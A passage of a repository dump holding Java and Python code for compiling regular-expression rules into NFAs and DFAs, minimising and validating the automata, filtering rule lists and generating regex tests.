partition.get(j).add(member);\n }\n if (partition.get(j).size() > partition.get(i).size()) {\n Set<Integer> tmp = partition.get(i);\n partition.set(i, partition.get(j));\n partition.set(j, tmp);\n }\n for (int classMember : partition.get(j)) {\n classAssigned[classMember] = j;\n }\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n queue.add(new Pair<>(j, c));\n }\n }\n });\n }\n\n Map<Set<Integer>, Node> bijection = new HashMap<>(partition.size());\n partition.forEach(set -> bijection.put(set, new Node()));\n Map<Node, Node> newNodes = new HashMap<>(partition.size());\n partition.forEach(set -> set.forEach(node -> newNodes.put(nodes.get(node), bijection.get(set))));\n\n for (Node node: nodes) {\n node.getEdges().forEach((c, target) -> newNodes.get(node).addEdge(c, newNodes.get(target)));\n newNodes.get(node).setTerminal(node.getTerminal());\n }\n\n return new Dfa(newNodes.get(dfa.getStart()));\n }\n}\n"
},
{
"alpha_fraction": 0.5916069746017456,
"alphanum_fraction": 0.5946775674819946,
"avg_line_length": 39.70833206176758,
"blob_id": "021d1b4fe379ded60d0b6088e530e99f5b982ef4",
"content_id": "7ef4ceba7f829fbdffb2fda8b597f648e829c8e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1954,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 48,
"path": "/input/filter.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import re\n\nclass RegexFilter:\n def __init__(self, cap_start_only=True, default_verdict=True, banned=set()):\n self.default_verdict = default_verdict\n self.counters = {'default': 0}\n self.rules = []\n\n self._add_filter_rule(lambda regex: regex in banned, 'banned')\n if cap_start_only:\n self._add_filter_rule(lambda regex: not regex.startswith('/^'), 'not_cap_start')\n num_backref_re = re.compile(r'\\\\\\d+')\n self._add_filter_rule(lambda regex: num_backref_re.search(regex) is not None, 'num_backref')\n self._add_filter_rule(lambda regex: r'(?P=' in regex, r'(?P=')\n self._add_filter_rule(lambda regex: r'(?!' in regex, r'(?!') \n self._add_filter_rule(lambda regex: r'(?=' in regex, r'(?=') \n self._add_filter_rule(lambda regex: r'\\b' in regex, r'\\b')\n\n\n def _add_filter_rule(self, rule, rulename, verdict=False):\n self.counters[rulename] = 0\n self.rules.append((rule, rulename, verdict))\n\n\n def __call__(self, regex):\n for rule, rulename, verdict in self.rules:\n if rule(regex):\n self.counters[rulename] += 1\n return verdict\n self.counters['default'] += 1\n return self.default_verdict\n\n\nwith open('./bans.txt') as bans:\n banned = set(list(bans.read().rstrip().split('\\n')))\n\n\nwith open('./unique.txt') as rules:\n rules_list = list(rules.read().rstrip().split('\\n'))\n rules_filter = RegexFilter(cap_start_only=True, banned=banned)\n result = list(filter(rules_filter, rules_list))\n result = list(map(lambda s: '/('.join(s.split('/', 1)), result))\n result = list(map(lambda s: ').*/'.join(s.rsplit('/', 1)), result))\n print('Verdicts, of {} rules:'.format(len(rules_list)))\n for rule, count in rules_filter.counters.items():\n print('{} : {}'.format(rule, count))\n with open('./filtered.txt', 'w') as filtered:\n filtered.write('\\n'.join(result))\n"
},
{
"alpha_fraction": 0.6465968489646912,
"alphanum_fraction": 0.6553228497505188,
"avg_line_length": 33.727272033691406,
"blob_id": "2969b1d7608a0860194ad76cc4f726ffbccc271f",
"content_id": "0034b95e523ddfb6cb4d7d8dff57cdc6a0ffe30b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 33,
"path": "/src/main/java/main/debug/SingleDfaRun.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.dfa.Dfa;\nimport main.Main;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\npublic class SingleDfaRun {\n public static void main(String[] args) throws IOException {\n// Dfa dfa = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n// new RecursiveCompressorStatic().compress(dfa);\n// System.out.println(dfa.nodesCount());\n// int x = dfa.nodesCount();\n// Main.compress(dfa);\n// assert x == dfa.nodesCount();\n//\n// Dfa dfa2 = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n// Main.compress(dfa2);\n// System.out.println(dfa2.nodesCount());\n// assert x <= dfa2.nodesCount();\n\n Dfa dfa2 = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n Main.compress(dfa2);\n int x = dfa2.nodesCount();\n Main.compress(dfa2);\n System.out.println(dfa2.nodesCount());\n assert x == dfa2.nodesCount();\n\n }\n}\n"
},
{
"alpha_fraction": 0.583038866519928,
"alphanum_fraction": 0.5971731543540955,
"avg_line_length": 34.375,
"blob_id": "9e9809390b0c74bd7dad62e3f82f33585a742c2e",
"content_id": "98c32538d1b4e73e64f375d4b46c7580d4de682b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 283,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/output/graph/filter_sizes.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./splitResults.txt') as results_fs:\n data = list(results_fs.read().rstrip().split('\\n'))\n\nwith open('./sizes.txt', 'w') as sizes_fs:\n result = [data[1 + i * 2] for i in range((len(data) - 1) // 2)]\n sizes_fs.write('\\n'.join(result))\n\nprint(sum(map(int, result)))\n"
},
{
"alpha_fraction": 0.4940750300884247,
"alphanum_fraction": 0.49818822741508484,
"avg_line_length": 34.0927848815918,
"blob_id": "17626a52363dc555deb6b7ff578f19a786726618",
"content_id": "a2674792dd62d0ab3fc711b6425b66fa50424360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 10211,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 291,
"path": "/src/main/java/automaton/dfa/Dfa.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.dfa;\n\nimport automaton.algo.AlgoException;\nimport automaton.nfa.Nfa;\nimport automaton.nfa.State;\nimport automaton.transition.SingleElementTransition;\nimport automaton.transition.Transition;\nimport automaton.transition.Transitions;\nimport util.Pair;\nimport util.Utils;\n\nimport java.io.BufferedReader;\nimport java.io.Reader;\nimport java.lang.reflect.Array;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class Dfa {\n public enum ParsingMode {\n LETTERS_LIST, SINGLE_EDGE, DESERIALIZE\n }\n\n public enum PrintingMode {\n VISUALISE, SERIALIZE\n }\n\n private Node start;\n\n public Dfa(Node start) {\n this.start = start;\n }\n\n public Collection<Integer> testImpl(String string) {\n Set<Integer> result = new HashSet<>();\n Node cur = start;\n for (int i = 0; i < string.length(); i++) {\n result.addAll(cur.getTerminal());\n char c = string.charAt(i);\n Map<Character, Node> edges = cur.getEdges();\n if (edges.containsKey(c)) {\n cur = edges.get(c);\n } else {\n return result;\n }\n }\n result.addAll(cur.getTerminal());\n return result;\n }\n\n public boolean testAny(String string) {\n return !test(string).isEmpty();\n }\n\n public Collection<Integer> test(String string) {\n return Utils.testHeader(this::testImpl, string);\n }\n\n public Collection<Node> allNodes() {\n return runDfs(start);\n }\n\n public Collection<Node> runDfs(Node node) {\n Queue<Node> queue = new ArrayDeque<>();\n queue.add(node);\n HashSet<Node> visited = new HashSet<>(queue);\n while (!queue.isEmpty()) {\n Node cur = queue.poll();\n cur.getEdges().values().stream()\n .filter(target -> !visited.contains(target))\n .forEach(target -> {\n visited.add(target);\n queue.add(target);\n });\n }\n return visited;\n }\n\n public Integer nodesCount() {\n return allNodes().size();\n }\n\n public Node getStart() {\n return start;\n }\n\n public long cutCount() {\n Collection<Node> nodes = allNodes();\n return nodes.stream()\n .map(this::runDfs)\n .map(path -> {\n Set<Integer> visited = new HashSet<>();\n path.forEach(node -> visited.addAll(node.getTerminal()));\n return visited.size() > 1;\n }).filter(a -> a).count();\n// .map(path -> path.distinct().count() > 1).count();\n// return nodes.stream()\n// .map(this::runDfs)\n// .map(path -> path.stream()\n// .flatMap(node -> node.getTerminal().stream()))\n// .map(path -> path.distinct().count() > 1).filter(a -> a).count();\n }\n\n// public void print(PrintingMode mode) {\n// print();\n// }\n\n public String print() {\n return print(PrintingMode.VISUALISE);\n }\n\n public String print(PrintingMode mode) {\n Collection<Node> nodes = allNodes();\n Map<Node, Integer> map = new HashMap<>(); // TODO: convert map into list?\n int counter = 0;\n for (Node node : nodes) {\n map.put(node, counter++);\n }\n return printImpl(map, mode);\n }\n\n public String print(Map<Node, Integer> map) { // TODO: strings mapping?\n return printImpl(map, PrintingMode.VISUALISE);\n }\n\n private String printImpl(Map<Node, Integer> map, PrintingMode mode) {\n StringBuilder out = new StringBuilder();\n Collection<Node> nodes = allNodes();\n for (Node node : nodes) {\n if (node == start) {\n// System.out.println(\"s \" + map.get(node));\n out.append(\"Graph:\\n\");\n out.append(\"s \").append(map.get(node)).append(\"\\n\");\n }\n }\n\n Map<Pair<Integer, Integer>, List<String>> edges = new HashMap<>();\n nodes.forEach(node -> {\n node.getEdges().forEach((c, target) -> {\n Pair<Integer, Integer> pair = new Pair<>(map.get(node), map.get(target));\n edges.putIfAbsent(pair, new ArrayList<>());\n if (mode == PrintingMode.VISUALISE) {\n edges.get(pair).add(\"\" + (c == 256 ? '$' : (c == 257 ? '^' : c)));\n } else {\n edges.get(pair).add(Integer.toString(c));\n }\n });\n if (node.isTerminal()) {\n String termStr = node.getTerminal().stream()\n .map(Object::toString)\n .collect(Collectors.joining(\" \"));\n// System.out.println(map.get(node) + \" \" + termStr);\n out.append(map.get(node)).append(\" \").append(termStr).append(\"\\n\");\n }\n// if (node.isTerminal()) {\n// System.out.print(\"T \");\n// }\n// System.out.println(node.hashCode() + \" \" + map.get(node));\n });\n edges.forEach((pair, chars) -> {\n String edgeName;\n if (mode == PrintingMode.VISUALISE) {\n if (chars.size() > 95) {\n edgeName = \"r\" + chars.size();\n } else {\n StringBuilder sb = new StringBuilder();\n chars.forEach(sb::append);\n edgeName = sb.toString();\n }\n// System.out.println(pair.getFirst() + \" \" + pair.getSecond() + \" \" + edgeName);\n out.append(pair.getFirst()).append(\" \").append(pair.getSecond()).append(\" \").append(edgeName).append(\"\\n\");\n } else {\n String s = String.join(\" \", chars);\n// System.out.println(pair.getFirst() + \" \" + pair.getSecond() + \" \" + s);\n out.append(pair.getFirst()).append(\" \").append(pair.getSecond()).append(\" \").append(s).append(\"\\n\");\n }\n });\n if (mode == PrintingMode.VISUALISE) {\n System.out.print(out.toString());\n return null;\n }\n return out.toString();\n }\n\n public void close() {\n allNodes().stream().filter(Node::isTerminal).forEach(terminal -> {\n if (!terminal.getEdges().isEmpty()) {\n if (terminal.getEdges().values().stream().anyMatch(target -> target != terminal) ||\n terminal.getEdges().size() != Transitions.MAX_CHAR + 1) {\n throw new AlgoException(\"Cannot close terminal with edges\");\n }\n }\n if (terminal.getTerminal().size() > 1) {\n throw new AlgoException(\"Cannot close multi-terminal\");\n }\n HashMap<Character, Node> mp = new HashMap<>();\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n mp.put(c, terminal);\n }\n terminal.setEdges(mp);\n });\n }\n\n public void setStart(Node start) {\n this.start = start;\n }\n\n public static Dfa parseDfa(BufferedReader reader) {\n return parseDfa(reader, ParsingMode.LETTERS_LIST);\n }\n\n public static Dfa parseDfa(BufferedReader reader, ParsingMode mode) {\n return parseDfa(reader.lines().toArray(String[]::new), mode);\n }\n\n public static Dfa parseDfa(String s) {\n return parseDfa(s.split(\"\\n\"), ParsingMode.LETTERS_LIST);\n }\n\n public static Dfa parseDfa(String[] lines, ParsingMode mode) {\n String[][] dataLines;\n int totalLines = lines.length;\n while (lines[totalLines - 1].equals(\"\")) {\n totalLines--;\n }\n if (!lines[0].equals(\"Graph:\")) {\n dataLines = new String[totalLines][0];\n for (int i = 0; i < totalLines; i++) {\n dataLines[i] = lines[i].split(\" \");\n }\n } else {\n dataLines = new String[totalLines - 1][0];\n for (int i = 0; i < totalLines - 1; i++) {\n dataLines[i] = lines[i + 1].split(\" \");\n }\n }\n HashMap<Integer, List<Pair<Character, Integer>>> mp = new HashMap<>();\n\n int i = 0;\n Integer start = null;\n if (dataLines[0][0].equals(\"s\")) {\n start = Integer.parseInt(dataLines[0][1]);\n i++;\n }\n Map<Integer, Integer> terminalIds = new HashMap<>();\n while (dataLines[i].length == 2) {\n terminalIds.put(Integer.parseInt(dataLines[i][0]), Integer.parseInt(dataLines[i][1]));\n i++;\n }\n for (; i < dataLines.length; i++) {\n String[] dataLine = dataLines[i];\n int a = Integer.parseInt(dataLine[0]);\n int b = Integer.parseInt(dataLine[1]);\n mp.putIfAbsent(a, new ArrayList<>());\n if (mode == ParsingMode.LETTERS_LIST) {\n for (char c : dataLine[2].toCharArray()) {\n assert c < Transitions.MAX_CHAR : \"\" + c;\n mp.get(a).add(new Pair<>(c, b));\n }\n } else {\n for (int j = 2; j < dataLine.length; j++) {\n mp.get(a).add(new Pair<>((char) Integer.parseInt(dataLine[j]), b));\n }\n }\n }\n ArrayList<Node> nodes = new ArrayList<>();\n int size = Integer.max(\n mp.keySet().stream()\n .reduce(Integer::max)\n .orElse(0),\n mp.values().stream()\n .flatMap(Collection::stream)\n .map(Pair::getSecond)\n .reduce(Integer::max)\n .orElse(0)) + 1;\n for (int j = 0; j < size; j++) {\n nodes.add(new Node());\n }\n mp.forEach((a, b) -> {\n b.forEach(edge -> {\n nodes.get(a).addEdge(edge.getFirst(), nodes.get(edge.getSecond()));\n });\n });\n\n terminalIds.forEach((id, terminal) -> {\n nodes.get(id).setTerminal(Collections.singletonList(terminal));\n });\n\n\n return new Dfa(nodes.get(start == null ? 0 : start));\n }\n}"
},
{
"alpha_fraction": 0.5343347787857056,
"alphanum_fraction": 0.553648054599762,
"avg_line_length": 28.125,
"blob_id": "bf8f6d83138fc70be3ca4978feec294b382ee75e",
"content_id": "870f42b26c48fe786af4b60d92520706032dbbf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 48,
"path": "/src/test/java/NfaTests.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import automaton.nfa.Nfa;\nimport main.Main;\nimport org.junit.Test;\nimport util.MyList;\n\nimport java.util.List;\n\nimport static org.junit.Assert.*;\n\npublic class NfaTests {\n private void testRegex(String regex, List<String> accepted, List<String> rejected) {\n Nfa nfa = Main.buildNfa(regex);\n for (String string: accepted) {\n assertTrue(nfa.test(string));\n }\n for (String string: rejected) {\n assertFalse(nfa.test(string));\n }\n }\n\n @Test\n public void testRepeated1() {\n String rule = \"/^a{1,3}/Hsmi\";\n List<String> accepted = MyList.of(\"a\", \"aa\", \"aaa\");\n List<String> rejected = MyList.of(\"\", \"aaaa\", \"b\");\n testRegex(rule, accepted, rejected);\n }\n\n @Test\n public void\n testRepeated2() {\n String rule = \"/^a{1,3}b{0,2}/Hsmi\";\n List<String> accepted = MyList.of(\"a\", \"aa\", \"aaa\", \"ab\", \"abb\", \"aaabb\");\n List<String> rejected = MyList.of(\"\", \"aaaa\", \"b\", \"bb\", \"baaa\", \"ba\", \"abbb\");\n testRegex(rule, accepted, rejected);\n }\n\n @Test\n public void\n testRepeated3() {\n String rule = \"/^\\\\w{0,1}\\\\d{0,2}/Hsmi\";\n List<String> accepted = MyList.of(\"\", \"a\", \"x\", \"a5\", \"b64\", \"44\", \"1\");\n List<String> rejected = MyList.of(\"aa2\", \"aa\", \"a345\", \"aaa\", \"42a\", \"3a\", \"a4a\");\n testRegex(rule, accepted, rejected);\n }\n\n// test\n}\n"
},
{
"alpha_fraction": 0.5816993713378906,
"alphanum_fraction": 0.5816993713378906,
"avg_line_length": 23.340909957885742,
"blob_id": "b39d209e0ca2808231d8c8377b6cac3881678f8c",
"content_id": "3a8b64c4caa9c4b96f9017b4760e319ad8002ea7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 44,
"path": "/src/main/java/automaton/transition/RangeTransition.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport parsing.ParsingError;\n\nimport java.util.ArrayList;\nimport java.util.Collection;\nimport java.util.List;\n\nimport static util.Utils.parseChar;\n\npublic class RangeTransition extends AbstractTransition {\n final private char l, r;\n\n public RangeTransition(char l, char r) {\n if (r > Transitions.MAX_CHAR) {\n throw new ParsingError(\"r > MAX_CHAR\");\n }\n if (l > r) {\n throw new ParsingError(\"l > r\");\n }\n this.l = l;\n this.r = r;\n }\n\n public RangeTransition(String l, String r) {\n this(parseChar(l), parseChar(r));\n assert parseChar(l) < Transitions.MAX_CHAR;\n assert parseChar(r) < Transitions.MAX_CHAR;\n }\n\n @Override\n public boolean testImpl(Character c) {\n return c >= l && c <= r;\n }\n\n @Override\n public Collection<Character> getAccepted() {\n List<Character> list = new ArrayList<>(); // TODO: HashSet?\n for (char c = l; c <= r; c++) {\n list.add(c);\n }\n return list;\n }\n}\n"
},
{
"alpha_fraction": 0.435988187789917,
"alphanum_fraction": 0.4436578154563904,
"avg_line_length": 22.8873233795166,
"blob_id": "b88aa1d531e942e629c70cfd4f18da89bc3a5beb",
"content_id": "ce283801fccdab5b3026ac4ea63796970f5a6d32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1695,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 71,
"path": "/pythonTests/python_refactor.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import re\nfrom python_tests import tests\n\n\nHEADER = \"\"\"package generated.python;\nimport templates.RegexTest;\n\npublic class PythonTestset {\n public static RegexTest[] allTests = {\n\"\"\"\n\nEND = \"\"\" };\n}\n\"\"\"\n\nTEST_TEMPLATE = \"\"\" new PythonTest(\"{}\", \"{}\", \"{}\", {}),\n\"\"\"\n\nbanned = [\n (r'\"(?:\\\\\"|[^\"])*?\"', r'\"\\\"\"'),\n (r'\\t\\n\\v\\r\\f\\a', '\\t\\n\\v\\r\\f\\a'),\n ('\\t\\n\\v\\r\\f\\a', '\\t\\n\\v\\r\\f\\a'),\n (r'\\x00f', '\\017')\n]\n\nbanned_words = [\n '\\\\b', '\\\\B',\n '(?P', '(?!',\n '(?=', '(?<',\n '(?#', '(?:'\n]\n\n\nwith open('./../src/test/java/generated/python/PythonTestset.java', \"w\") as result:\n result.write(HEADER)\n for i, (regex, string, verdict, *b) in enumerate(tests):\n try:\n num_backref_re = re.compile(r'\\\\\\d+')\n if num_backref_re.search(regex) is not None:\n continue\n\n found = False\n for word in banned_words:\n if word in regex:\n found = True\n break\n if found:\n continue\n\n if (regex, string) in banned:\n continue\n\n mode = \"\"\n\n rule = repr(regex)[1:-1]\n if rule.startswith('(?i)'):\n rule = rule[4:]\n mode = \"i\"\n\n rule = '/' + rule + '/' + mode\n\n# hex_re = re.compile(r'\\\\x[0-9a-hA-H]{2}?')\n# matches = hex_re.findall(regex)\n# for match in matches:\n# regex.replace\n\n result.write(' new RegexTest(\"#{}\", \"{}\", \"{}\", {}),\\n'.format(i, rule, repr(string)[1:-1], verdict))\n except UnicodeEncodeError as e:\n print(e, string)\n\n result.write(END)"
},
{
"alpha_fraction": 0.6160287261009216,
"alphanum_fraction": 0.6160287261009216,
"avg_line_length": 25.125,
"blob_id": "df83c9743665ea093db830567cc0c6d10ab11a68",
"content_id": "56ba5c660f603e81ace9405d74c26dd37b6bc8ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 836,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 32,
"path": "/src/main/java/automaton/transition/UnionTransition.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport java.util.Collection;\nimport java.util.HashSet;\nimport java.util.stream.Collectors;\nimport java.util.stream.Stream;\n\npublic class UnionTransition extends AbstractTransition {\n final private Transition a, b;\n private Collection<Character> accepted;\n\n public UnionTransition(Transition a, Transition b) {\n this.a = a;\n this.b = b;\n }\n\n @Override\n public boolean testImpl(Character c) {\n return a.test(c) | b.test(c);\n }\n\n @Override\n public Collection<Character> getAccepted() {\n if (accepted == null) {\n accepted = Stream.concat(\n a.getAccepted().stream(),\n b.getAccepted().stream())\n .collect(Collectors.toCollection(HashSet::new));\n }\n return accepted;\n }\n}\n"
},
{
"alpha_fraction": 0.48854580521583557,
"alphanum_fraction": 0.4905378520488739,
"avg_line_length": 40.83333206176758,
"blob_id": "f30b32777b60303384031119539f9a1ca5c140c0",
"content_id": "e47efce609c2e6d37db0516df5980d36debd5cc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4016,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 96,
"path": "/src/main/java/automaton/algo/thompson/ThompsonModifiedDfs.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.thompson;\n\nimport automaton.algo.AlgoException;\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.nfa.Nfa;\nimport automaton.nfa.State;\nimport automaton.transition.EpsilonTransition;\nimport automaton.transition.Transitions;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class ThompsonModifiedDfs {\n private final Stack<List<Set<State>>> queue = new Stack<>();\n private final HashMap<List<Set<State>>, Node> bijection = new HashMap<>();\n private ArrayList<Node> finals;\n\n public Node createNode(List<Set<State>> states) {\n Node node = new Node();\n bijection.put(states, node);\n queue.add(states);\n return node;\n }\n\n public Dfa run(List<Nfa> nfas) {\n finals = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n finals.add(null);\n }\n List<Set<State>> startSets = nfas.parallelStream()\n .map(Nfa::getStart)\n .map(state -> State.traverseEpsilonsSafe(Collections.singletonList(state)))\n .collect(Collectors.toList());\n\n Node newStart = createNode(startSets);\n\n while (!queue.isEmpty()) {\n List<Set<State>> statesList = queue.pop();\n Node curNode = bijection.get(statesList);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n List<Set<State>> newStatesList = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n Set<State> states = statesList.get(i);\n char finalC = c;\n Set<State> newStates = states.parallelStream()\n .flatMap(state -> state.getEdges().stream())\n .filter(edgePair -> !(edgePair.getFirst() instanceof EpsilonTransition) &&\n edgePair.getFirst().test(finalC))\n .map(Pair::getSecond)\n .collect(Collectors.toSet());\n newStatesList.add(newStates);\n }\n List<Integer> nonEmptySets = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n if (!newStatesList.get(i).isEmpty()) {\n nonEmptySets.add(i);\n }\n }\n\n if (nonEmptySets.size() > 1) {\n newStatesList = newStatesList.parallelStream()\n .map(State::traverseEpsilonsSafe)\n .collect(Collectors.toList());\n for (int i = 0; i < newStatesList.size(); i++) {\n Set<State> states = newStatesList.get(i);\n int finalI = i;\n states.forEach(state -> {\n if (state.isTerminal()) {\n throw new AlgoException(\"Found terminal state which belongs to more than one Nfa: \" + nonEmptySets.stream() + \" terminal:\" + state.getTerminal());\n }\n });\n }\n Node newNode;\n if (!bijection.containsKey(newStatesList)) { // TODO: empty newStates\n newNode = createNode(newStatesList);\n } else {\n newNode = bijection.get(newStatesList);\n }\n curNode.addEdge(c, newNode);\n } else if (nonEmptySets.size() == 1) {\n int index = nonEmptySets.get(0);\n Node newNode = finals.get(index);\n if (newNode == null) {\n newNode = new Node();\n finals.set(index, newNode);\n }\n newNode.setTerminal(Collections.singletonList(index));\n curNode.addEdge(c, newNode);\n }\n }\n }\n return new Dfa(newStart);\n }\n}\n"
},
{
"alpha_fraction": 0.6159150004386902,
"alphanum_fraction": 0.6244875192642212,
"avg_line_length": 39.345863342285156,
"blob_id": "eefff5e259d8f99c55eddcf2c2256c03a1a8d573",
"content_id": "62ce3ca0e99970f2170ddd7c60c4b67afef5014b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5366,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 133,
"path": "/src/main/java/main/debug/RecursiveValidate.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorMinRootDist;\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.algo.compressor.validator.HeuristicValidator;\nimport automaton.algo.compressor.validator.MergePairValidator;\nimport automaton.algo.compressor.validator.RecursiveStaticValidator;\nimport automaton.algo.thompson.ThompsonModified;\nimport automaton.dfa.Dfa;\nimport automaton.nfa.Nfa;\nimport main.Main;\nimport main.io.Input;\nimport util.Utils;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nimport static main.Main.compress;\n\npublic class RecursiveValidate {\n public static void main(String[] args) throws IOException {\n// for (int i = 0; i < 10; )\n Path path = Paths.get(\"./output/graph/validation\");\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./heuristic_recursive.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.validate2(dfa, \"HTR\"));\n//\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./recursive.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.validate2(dfa, \"REC\"));\n\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./heuristic.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.heuristic2validate(dfa, \"HEU\"));\n\n Files.list(path)\n .sorted()\n .map(p -> p.resolve(\"./modified.txt\").toString())\n .map(Input::readSerialized)\n .forEachOrdered(RecursiveValidate::minRootHeuristic);\n\n\n\n// List<List<String>> groupRules = Input.readGroups(Static.FILTERED, Static.TOP_10_GROUPS);\n// for (List<String> group : groupRules) {\n// processGroup(group);\n// }\n }\n\n private static int groupId = 0;\n\n public static void validate1(List<String> rules) {\n groupId++;\n System.out.println(\"Group #\" + groupId + \" with \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n Dfa dfaHeuristic = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/modified.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n compress(dfaHeuristic);\n System.out.println(\"ThompsonModifiedHeuristic: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/heuristic.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n new RecursiveCompressorStatic().compress(dfaHeuristic);\n System.out.println(\"HeuristicThenRecursive: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/heuristic_recursive.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n boolean test1_1 = new HeuristicValidator().test(dfaHeuristic);\n assert test1_1;\n System.out.println(\"(1) HTR: \" + (test1_1 ? \"ok\" : \"failed\"));\n boolean test2_1 = new RecursiveStaticValidator().test(dfaHeuristic);\n assert test2_1;\n System.out.println(\"(2) HTR: \" + (test2_1 ? \"ok\" : \"failed\"));\n\n// new RecursiveCompressorStatic().compress(dfaHeuristic);\n\n Dfa dfaRecursive = new ThompsonModified().run(nfas);\n new RecursiveCompressorStatic().compress(dfaRecursive);\n System.out.println(\"ThompsonModifiedRecursive: \" + dfaRecursive.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/recursive.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n boolean test1_2 = new HeuristicValidator().test(dfaRecursive);\n assert test1_2;\n System.out.println(\"(1) TMR: \" + (test1_2 ? \"ok\" : \"failed\"));\n boolean test2_2 = new RecursiveStaticValidator().test(dfaHeuristic);\n assert test2_2;\n System.out.println(\"(2) TMR: \" + (test2_2 ? \"ok\" : \"failed\"));\n\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n\n public static void validate2(Dfa dfa, String name) {\n boolean test3 = new MergePairValidator().test(dfa);\n assert test3;\n System.out.println(\"(3) \" + name + \": \" + (test3 ? \"ok\" : \"failed\"));\n }\n\n public static void heuristic2validate(Dfa dfa, String name) {\n int x = dfa.nodesCount();\n compress(dfa);\n boolean success = dfa.nodesCount() == x;\n assert success;\n System.out.println(\"(4) \" + name + \": \" + (success ? \"ok\" : \"failed\"));\n }\n\n private static void minRootHeuristic(Dfa dfa) {\n groupId++;\n System.out.println(\"Group #\" + groupId + \" with \" + dfa.nodesCount() + \" nodes\");\n new RecursiveCompressorMinRootDist().compress(dfa);\n System.out.println(\"MinRootDist: \" + dfa.nodesCount());\n }\n}\n"
},
{
"alpha_fraction": 0.4785875380039215,
"alphanum_fraction": 0.4808414578437805,
"avg_line_length": 29.953489303588867,
"blob_id": "179763734f8452bf69da886d7695f75f2307f98f",
"content_id": "901575154461848951aef8022bdb6b3ac762c603",
"detected_licenses": [],
"is_generated": false,
